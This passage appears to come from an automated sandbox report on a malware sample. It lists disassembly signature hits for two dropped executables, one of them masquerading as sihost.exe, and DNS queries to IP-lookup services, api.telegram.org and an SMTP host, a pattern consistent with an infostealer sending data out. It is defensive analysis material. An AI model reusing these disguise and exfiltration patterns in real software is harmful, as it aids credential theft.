                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004927D1h17_2_00492500
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049D1FAh17_2_0049CF00
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049BA12h17_2_0049B718
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004967E1h17_2_00496510
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00491A09h17_2_00491738
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049D6C2h17_2_0049D3C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00491EA1h17_2_00491BD0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00495EB1h17_2_00495BE0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049BEDAh17_2_0049BBE0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00493EA1h17_2_00493BF8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049A6F2h17_2_0049A3F8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049B082h17_2_0049AD88
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00494C51h17_2_00494980
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00492C69h17_2_00492998
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00496C7Ah17_2_004969A8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049989Ah17_2_004995A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049EEAAh17_2_0049EBB0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B033Ah17_2_004B0040
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B4162h17_2_004B3E68
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B330Ah17_2_004B3010
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B1B22h17_2_004B1828
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B37D2h17_2_004B34D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B1FEAh17_2_004B1CF0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B297Bh17_2_004B2680
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B1192h17_2_004B0E98
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B2E42h17_2_004B2B48
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B165Ah17_2_004B1360
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B0802h17_2_004B0508
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B0CCAh17_2_004B09D0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B3C9Ah17_2_004B39A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004B24B2h17_2_004B21B8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067AD11h17_2_0067AA68
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067BA19h17_2_0067B770
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00673319h17_2_00673070
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00674021h17_2_00673D78
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067C721h17_2_0067C478
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067EC49h17_2_0067E978
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067FA11h17_2_0067F740
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00676FE9h17_2_00676D40
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00677CF1h17_2_00677A48
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 006789F9h17_2_00678750
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00679701h17_2_00679458
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067C2C9h17_2_0067C020
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00673BC9h17_2_00673920
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067CFD1h17_2_0067CD28
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 006748D1h17_2_00674628
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 006755D9h17_2_00675330
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067DCD9h17_2_0067DA30
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 006762E1h17_2_00676038
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 006792A9h17_2_00679000
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067F0E1h17_2_0067EE10
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067B5C1h17_2_0067B318
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00675E89h17_2_00675BE0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067E7B1h17_2_0067E4E0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00676B91h17_2_006768E8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00677899h17_2_006775F0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 006785A1h17_2_006782F8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067B169h17_2_0067AEC0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067BE71h17_2_0067BBC8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00673771h17_2_006734C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067CB7Bh17_2_0067C8D0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00674479h17_2_006741D0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00675181h17_2_00674ED8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067D881h17_2_0067D5D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00678149h17_2_00677EA0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067F579h17_2_0067F2A8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00678E51h17_2_00678BA8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00679B59h17_2_006798B0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067D429h17_2_0067D180
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00674D29h17_2_00674A80
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00675A31h17_2_00675788
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0067E1C5h17_2_0067DE88
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00676739h17_2_00676490
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00677441h17_2_00677198
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]17_2_009D5F38
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then push 00000000h17_2_009D7FD3
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]17_2_009D29CE
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]17_2_009D2E16
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]17_2_009D2B00
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]17_2_009D5F28
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]17_2_009D2A50
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00379449h29_2_00379188
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h29_2_00376C80
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00379A0Bh29_2_003795F8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00377945h29_2_00377758
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 003782CFh29_2_00377758
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 003767D4h29_2_00376823
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0037F2E9h29_2_0037F009
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00379A0Bh29_2_0037993A
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0037FC19h29_2_0037F939
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h29_2_003772B2
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0037EE51h29_2_0037EB70
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0037F781h29_2_0037F4A1
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h29_2_00377491
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 003767D4h29_2_00376638
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00477ED9h29_2_00477C08
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00478A42h29_2_00478748
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00470311h29_2_00470040
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00474321h29_2_00474050
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00472339h29_2_00472068
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00476349h29_2_00476078
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047F372h29_2_0047F078
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00478F0Ah29_2_00478C10
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047ABBAh29_2_0047A8C0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004707A9h29_2_004704D8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004793D2h29_2_004790D8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004747B9h29_2_004744E8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047DB8Ah29_2_0047D890
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00478412h29_2_004780A0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047C3A2h29_2_0047C0A8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047F83Ah29_2_0047F540
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047E052h29_2_0047DD58
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00470C41h29_2_00470970
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047C86Ah29_2_0047C570
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004727D1h29_2_00472500
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004767E1h29_2_00476510
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00474C51h29_2_00474980
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047B082h29_2_0047AD88
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00472C69h29_2_00472998
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047989Ah29_2_004795A0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00476C7Ah29_2_004769A8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00477111h29_2_00476E40
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047B54Ah29_2_0047B250
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00479D62h29_2_00479A68
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004710D9h29_2_00470E08
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047FD02h29_2_0047FA08
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004750E9h29_2_00474E18
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047E51Ah29_2_0047E220
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00473101h29_2_00472E30
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047CD32h29_2_0047CA38
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00473599h29_2_004732C8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 004775A9h29_2_004772D8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047E9E2h29_2_0047E6E8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00471571h29_2_004712A0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00475581h29_2_004752B0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00475A19h29_2_00475748
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00473A31h29_2_00473760
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00477A41h29_2_00477770
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047D1FAh29_2_0047CF00
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047BA12h29_2_0047B718
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047A22Ah29_2_00479F30
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00471A09h29_2_00471738
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047D6C2h29_2_0047D3C8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00471EA1h29_2_00471BD0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00475EB1h29_2_00475BE0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047BEDAh29_2_0047BBE0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00473EA1h29_2_00473BF8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047A6F2h29_2_0047A3F8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0047EEAAh29_2_0047EBB0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0051033Ah29_2_00510040
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00514162h29_2_00513E68
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0051330Ah29_2_00513010
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00511B22h29_2_00511828
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005137D2h29_2_005134D8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00511FEAh29_2_00511CF0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00511192h29_2_00510E98
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0051297Bh29_2_00512680
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00512E42h29_2_00512B48
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 0051165Ah29_2_00511360
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00510802h29_2_00510508
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00510CCAh29_2_005109D0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005124B2h29_2_005121B8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 00513C9Ah29_2_005139A0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FFA11h29_2_005FF740
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F62E1h29_2_005F6038
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F9701h29_2_005F9458
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F89F9h29_2_005F8750
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F7CF1h29_2_005F7A48
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F6FE9h29_2_005F6D40
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F4021h29_2_005F3D78
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FC721h29_2_005FC478
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FEC49h29_2_005FE978
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FBA19h29_2_005FB770
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F3319h29_2_005F3070
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FAD11h29_2_005FAA68
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FB5C1h29_2_005FB318
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FF0E1h29_2_005FEE10
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F92A9h29_2_005F9000
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F55D9h29_2_005F5330
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FDCD9h29_2_005FDA30
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FCFD1h29_2_005FCD28
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F48D1h29_2_005F4628
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FC2C9h29_2_005FC020
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F3BC9h29_2_005F3920
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F5181h29_2_005F4ED8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FD881h29_2_005FD5D8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FCB7Bh29_2_005FC8D0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F4479h29_2_005F41D0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FBE71h29_2_005FBBC8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F3771h29_2_005F34C8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FB169h29_2_005FAEC0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F85A1h29_2_005F82F8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F7899h29_2_005F75F0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F6B91h29_2_005F68E8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F5E89h29_2_005F5BE0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FE7B1h29_2_005FE4E0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F7441h29_2_005F7198
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F6739h29_2_005F6490
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F5A31h29_2_005F5788
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FE1C5h29_2_005FDE88
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FD429h29_2_005FD180
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F4D29h29_2_005F4A80
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F9B59h29_2_005F98B0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005FF579h29_2_005FF2A8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F8E51h29_2_005F8BA8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then jmp 005F8149h29_2_005F7EA0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_00625F38
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_00625F28
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_00622B00
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_00622E16
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]29_2_00622AF6
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 4x nop then push 00000000h29_2_00627FCB
                        Source: global trafficDNS query: name: exi.link
                        Source: global trafficDNS query: name: exi.link
                        Source: global trafficDNS query: name: exi.link
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: checkip.dyndns.org
                        Source: global trafficDNS query: name: reallyfreegeoip.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
